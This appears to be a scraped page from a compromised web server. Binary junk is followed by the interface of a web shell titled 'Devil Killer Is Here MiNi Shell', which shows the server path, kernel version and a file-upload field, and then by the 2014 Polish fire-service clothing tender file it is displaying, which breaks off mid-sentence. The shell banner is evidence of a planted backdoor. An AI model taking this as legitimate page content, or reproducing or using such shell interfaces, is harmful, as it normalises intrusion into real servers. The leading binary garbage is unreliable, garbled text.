JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140305/72844-N-2014.html

<p class="kh_header"><b>Warszawa: Odzież specjalna i środki ochrony indywidualnej użytkowane w Państwowej Straży Pożarnej</b><br>
<b>Numer ogłoszenia: 72844 - 2014; data zamieszczenia: 05.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Główna Służby Pożarniczej , ul. Słowackiego 52/54, 01-629 Warszawa, woj. mazowieckie, tel. 022 5617624, faks 022 8330724.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sgsp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odzież specjalna i środki ochrony indywidualnej użytkowane w Państwowej Straży Pożarnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1. Przedmiotem zamówienia jest dostawa do siedziby Zamawiającego odzieży specjalnej i środków ochrony indywidualnej użytkowanych w Państwowej Straży Pożarnej o różnym asortymencie składającym się z 19 różnych pozycji: 

- pozycja nr 1: Rękawice specjalne
- pozycja nr 2: Kominiarka
- pozycja nr 3: Ubrania specjalne
- pozycja nr 4: Buty strażackie
- pozycja nr 5: Hełm strażacki
- pozycja nr 6: Zatrzaśnik strażacki duży
- pozycja nr 7: Pas strażacki
- pozycja nr 8: Pochewka na toporek
- pozycja nr 9: Podpinka linkowa
- pozycja nr 10: Ubrania koszarowe
- pozycja nr 11: Obuwie koszarowe
- pozycja nr 12: Ubranie dla kadry dowódczo-sztabowej
- pozycja nr 13: Buty dla kadry dowódczo-sztabowej
- pozycja nr 14: Sztormiak
- pozycja nr 15: Koszulki letnie i koszulki zimowe
- pozycja nr 16: Worek marynarski
- pozycja nr 17: Plecak (kostka) 
- pozycja nr 18: Manierka
- pozycja nr 19: Menażka

Szczegółowy wykaz zamówienia, warunki jakie musi spełniać oferowany asortyment oraz warunki jego realizacji szczegółowo zostały opisane w Rozdziale II SIWZ Opis szczegółowy przedmiotu zamówienia. 

Zamówienie o wartości szacunkowej mniejszej od kwoty 207 000 euro..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6, 35.11.00.00-8, 35.81.20.00-9, 18.93.11.00-5, 39.22.12.60-7, 18.83.20.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.) Wykonawcy składający ofertę dostawę wybranego asortymentu określonego w SWIZ w pozycjach numer 2, 6-9 i 11-19 nie są zobowiązani zabezpieczać oferty wadium. 
2) Wykonawcy składający ofertę na asortyment określony w SIWZ w pozycjach numer 1,3-5 i 10 są zobowiązani zabezpieczyć ofertę wadium w wysokości: 

Poz. nr 1:	Rękawice specjalne	   500,00 zł    (słownie: pięćset złotych)
Poz. nr 3:	Ubrania specjalne	4 000, 00 zł   (słownie: cztery tysiące złotych)
Poz. nr 4:	Buty strażackie	1 400, 00 zł   (słownie: tysiąc czterysta złotych)
Poz. nr 5:	Hełm strażacki	1 500, 00 zł   (słownie: tysiąc pięćset złotych)
Poz. nr 10:	Ubrania koszarowe	2 500, 00 zł   (słownie: dwa tysiące pięćset złotych)

3)Okres ważności wadium musi obejmować cały okres związania ofertą.

4) Forma wadium.
Wadium może być wniesione w następujących formach:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.)

5) W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja musi być gwarancją nieodwołalną, bezwarunkową i płatną na pierwsze pisemne żądanie Zamawiającego, sporządzoną zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją,
c) kwotę gwarancji,
d) termin ważności gwarancji,
e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
- odmówił podpisania umowy na warunkach określonych w ofercie, lub
- nie wniósł zabezpieczenia należytego wykonania umowy, lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
oraz przed wyborem oferty najkorzystniejszej
- jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń , o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, iż wynika to z przyczyn nieleżących po jego stronie.

6) Miejsce i sposób wniesienia wadium.
Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego:

nr 68 1030 1508 0000 0008 1630 1084  w BH

tytułem: wadium w sprawie PN 02/14 asortyment nr .......

W przypadku wnoszenia wadium w innej formie niż pieniężnej, Wykonawca winien złożyć w ofercie kserokopię dokumentu poświadczoną za zgodność z oryginałem przez Wykonawcę, przy czym oryginał dokumentu należy złożyć w oddzielnej kopercie wraz z ofertą.

W przypadku przelewu wadium na konto Zamawiającego, do oferty należy dołączyć kserokopię przelewu potwierdzoną za zgodność z oryginałem.

Za skutecznie wniesione wadium w pieniądzu, Zamawiający uzna wadium, które w oznaczonym terminie tj. terminie złożenia oferty znajduje się na rachunku Zamawiającego.

6) Termin wniesienia wadium.

- Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
- Wykonawca zostanie wykluczony z niniejszego postępowania, jeżeli jego oferta przed upływem terminu składania ofert nie zostanie zabezpieczona wadium w wymaganej wysokości i w wybranej formie spośród możliwych wyżej wymienionych.

7) Utrata wadium.

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:

- odmówił podpisania umowy na warunkach określonych w ofercie, lub
- nie wniósł zabezpieczenia należytego wykonania umowy, lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
oraz przed wyborem oferty najkorzystniejszej
- jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń , o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, iż wynika to z przyczyn nie leżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie, wymaga się od wykonawców złożenia wyłącznie stosownego oświadczenia  w oświadczeniu  składanym w trybie art. 44 ustawy Pzp,  którego treść zawarta jest w Rozdziale III SIWZ - załącznik nr 2.
Ocena spełniania przez Wykonawców wyżej wymienionego warunku wg formuły spełnia - nie spełnia, polegać będzie na sprawdzeniu czy złożony dokument odpowiada stawianym wymaganiom.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy realizowania dostaw na asortyment wymieniony w pozycji: 2, 6,7,8,9,12-19:
W tym zakresie, wymaga się od wykonawców złożenia wyłącznie stosownego oświadczenia  w oświadczeniu  składanym w trybie art. 44 ustawy Pzp,  którego treść zawarta jest w Rozdziale III SIWZ - załącznik nr 2.
Ocena spełniania przez Wykonawców wyżej wymienionego warunku wg formuły spełnia - nie spełnia, polegać będzie na sprawdzeniu czy złożony dokument odpowiada stawianym wymaganiom.

Dotyczy realizowania dostaw na asortyment wymieniony w pozycji: 1,3,4,5,10 i 11:
W tym zakresie wymaga się od wykonawców, poza oświadczeniem składanym w trybie art. 44 ustawy Pzp,  przedłożenia wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz, których dostawy zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie. Wzór wykazu podany jest w Rozdziale III SIWZ -załącznik nr 4.

W oparciu o uprawnienia wynikające z § 1 ust. 4 rozporządzenia PRM z 19.02.2013 r. zamawiający ustala: 
a) że pod pojęciem głównych dostaw dla potrzeb niniejszego postępowania należy rozumieć wszystkie zrealizowane/realizowane przez Wykonawcę dostawy asortymentu którego dotyczy oferta Wykonawcy we wskazanym jw. okresie:

- poz. nr 1: rękawic specjalnych*,
- poz. nr 3: ubrań specjalnych*, 
- poz. nr 4: butów strażackich*,
- poz. nr 5: hełmów strażackich*,
- poz. nr 10: ubrań koszarowych*, 
- poz. nr 11: obuwia koszarowego*,
dla Straży Pożarnych (np. PSP, OSP (w tym także na rzecz SGSP)).

*należy wykazać się wyłącznie dostawami asortymentu którego dotyczy oferta Wykonawcy, tzn. Wykonawca nie musi wykazać się doświadczeniem w dostawie np. asortymenty określonego w pozycji nr 1 jeżeli nie składa oferty na jego dostawę.

b) że z punktu widzenia przyszłej realizacji przedmiotowego zamówienia wykonawca powinien wykazać się w wyżej wymienionym wykazie, że z pośród zrealizowanych/realizowanych  dostaw co najmniej dwie dostawy wg zakresu j.w. były o wartości równej bądź przekraczającej: 

- poz. nr 1:    7 500, 00 zł brutto każda,
- poz. nr 3:   75 000,00 zł brutto każda,
- poz. nr 4:   20 000, 00 zł brutto każda,
- poz. nr 5:   20 000,00 zł brutto każda,
- poz. nr 10: 20 000,0 zł brutto każda, 
- poz. nr 11:   5 000,00 zł brutto każda,

Ocena spełniania przez wykonawców wyżej wymienionego warunku wg formuły spełnia -nie spełnia, polegać będzie na sprawdzeniu czy Wykonawca złożył wymagany dokument i wynikać z niego będzie że Wykonawca spełnia warunki określone w pkt. a) i b). 

Dowody należytego wykonania dostaw Wykonawca zobowiązany jest załączyć wyłącznie dla dostaw o których mowa w pkt. b).

W przypadku gdy Szkoła Główna Służby Pożarniczej jest podmiotem na rzecz którego dostawy wskazane przez Wykonawcę w wymaganym wykazie zostały wcześniej wykonane , Wykonawca nie ma obowiązku przedkładania ww. dowodów należytego wykonania dostaw.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie, wymaga się od wykonawców złożenia wyłącznie stosownego oświadczenia  w oświadczeniu  składanym w trybie art. 44 ustawy Pzp,  którego treść zawarta jest w Rozdziale III SIWZ - załącznik nr 2.
Ocena spełniania przez Wykonawców wyżej wymienionego warunku wg formuły spełnia - nie spełnia, polegać będzie na sprawdzeniu czy złożony dokument odpowiada stawianym wymaganiom.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie, wymaga się od wykonawców złożenia wyłącznie stosownego oświadczenia  w oświadczeniu  składanym w trybie art. 44 ustawy Pzp,  którego treść zawarta jest w Rozdziale III SIWZ - załącznik nr 2.
Ocena spełniania przez Wykonawców wyżej wymienionego warunku wg formuły spełnia - nie spełnia, polegać będzie na sprawdzeniu czy złożony dokument odpowiada stawianym wymaganiom.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie, wymaga się od wykonawców złożenia wyłącznie stosownego oświadczenia  w oświadczeniu  składanym w trybie art. 44 ustawy Pzp,  którego treść zawarta jest w Rozdziale III SIWZ - załącznik nr 2.
Ocena spełniania przez Wykonawców wyżej wymienionego warunku wg formuły spełnia - nie spełnia, polegać będzie na sprawdzeniu czy złożony dokument odpowiada stawianym wymaganiom.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W oparciu o uprawnienia wynikające z § 1 ust. 4 rozporządzenia PRM z 19.02.2013 r. zamawiający ustala: 
a) że pod pojęciem głównych dostaw dla potrzeb niniejszego postępowania należy rozumieć wszystkie zrealizowane/realizowane przez Wykonawcę dostawy asortymentu którego dotyczy oferta Wykonawcy we wskazanym jw. okresie:

- poz. nr 1: rękawic specjalnych*,
- poz. nr 3: ubrań specjalnych*, 
- poz. nr 4: butów strażackich*,
- poz. nr 5: hełmów strażackich*,
- poz. nr 10: ubrań koszarowych*, 
- poz. nr 11: obuwia koszarowego*,
dla Straży Pożarnych (np. PSP, OSP (w tym także na rzecz SGSP)).

*należy wykazać się wyłącznie dostawami asortymentu którego dotyczy oferta Wykonawcy, tzn. Wykonawca nie musi wykazać się doświadczeniem w dostawie np. asortymenty określonego w pozycji nr 1 jeżeli nie składa oferty na jego dostawę.

b) że z punktu widzenia przyszłej realizacji przedmiotowego zamówienia wykonawca powinien wykazać się w wyżej wymienionym wykazie, że z pośród zrealizowanych/realizowanych  dostaw co najmniej dwie dostawy wg zakresu j.w. były o wartości równej bądź przekraczającej: 

- poz. nr 1:    7 500, 00 zł brutto każda,
- poz. nr 3:   75 000,00 zł brutto każda,
- poz. nr 4:   20 000, 00 zł brutto każda,
- poz. nr 5:   20 000,00 zł brutto każda,
- poz. nr 10: 20 000,0 zł brutto każda, 
- poz. nr 11:   5 000,00 zł brutto każda,

Ocena spełniania przez wykonawców wyżej wymienionego warunku wg formuły spełnia -nie spełnia, polegać będzie na sprawdzeniu czy Wykonawca złożył wymagany dokument i wynikać z niego będzie że Wykonawca spełnia warunki określone w pkt. a) i b). 

Dowody należytego wykonania dostaw Wykonawca zobowiązany jest załączyć wyłącznie dla dostaw o których mowa w pkt. b).

W przypadku gdy Szkoła Główna Służby Pożarniczej jest podmiotem na rzecz którego dostawy wskazane przez Wykonawcę w wymaganym wykazie zostały wcześniej wykonane , Wykonawca nie ma obowiązku przedkładania ww. dowodów należytego wykonania dostaw.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym w rozdziale II SIWZ Opis szczegółowy przedmioty zamówienia, Wykonawcy przedłożyć muszą: 

Wymagany dokument/wzór:
1. Wzór oferowanego asortymentu zgodny/identyczny z produktem który       zostanie dostarczony na etapie realizacji umowy (dotyczy całego asortymentu). 

Wzory zostaną zwrócone Wykonawcom po zakończeniu postępowania na ich koszt lub możliwy będzie odbiór osobisty w siedzibie Zamawiającego.
Wybranemu Wykonawcy wzory zostaną zwrócone po dokonanej dostawie przedmiotu zamówienia i dokonaniu jego pozytywnego odbioru.

2. Aktualne świadectwo dopuszczenia wyrobu do użytkowania wydane przez CNBOP w Józefowie, zgodne z §6 Rozporządzenia MSWiA z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.) - dotyczy asortymentu określonego w pozycjach nr 1 - 7.
3. Deklaracja zgodności WE dla oferowanego produktu, sporządzona zgodnie z § 36 rozporządzenia Ministra Gospodarki z dnia 21 grudnia 2005 r. w sprawie zasadniczych wymagań dla środków ochrony indywidualnej  (Dz. U. z 2005 r. Nr 259, poz. 2173) - dotyczy asortymentu określonego w pozycjach nr 1 - 6.
4. Oświadczenie Wykonawcy dotyczące oferowanych wyrobów, które stanowi załącznik nr 3 do SIWZ - dotyczy asortymentu określonego w pozycjach nr 10 - 15.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Okres gwarancji - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmiany  istotnych postanowień zawartej umowy, w stosunku do treści oferty, w zakresie: 
1) ustawowej zmiany stawki podatku VAT.
2) terminu realizacji przedmiotu zamówienia - gdy wystąpi konieczność zmiany terminu w związku z wydłużającym się postępowaniem lub zaistnieją okoliczności mające wpływ na termin realizacji, a których nie udało się przewidzieć w chwili zawarcia umowy.
3) parametrów technicznych przedmiotu zamówienia - w przypadku gdy zmiany te będą korzystniejsze dla zamawiającego
Powyższe zmiany będą dopuszczalne, przy założeniu, że nie ulegnie zmianie cena ofertowa.  Każda ewentualna zmiana wymagać będzie odrębnego rozpatrzenia i zasadności jej wprowadzenia oraz wymagać będzie formy aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sgsp.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie SGSP w Warszawie ul. Słowackiego 52/54  Dział Zamówień Publicznych pok. 323 - wejście od ul. Siemiradzkiego 2 (obiekt 02)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2014 godzina 10:00, miejsce: W siedzibie SGSP w Warszawie ul. Słowackiego 52/54  KANCELARIA OGÓLNA pok. 102 - wejście od ul. Siemiradzkiego 2 (obiekt 02)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rękawice specjalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonane zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.7. Rękawice specjalne określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych 
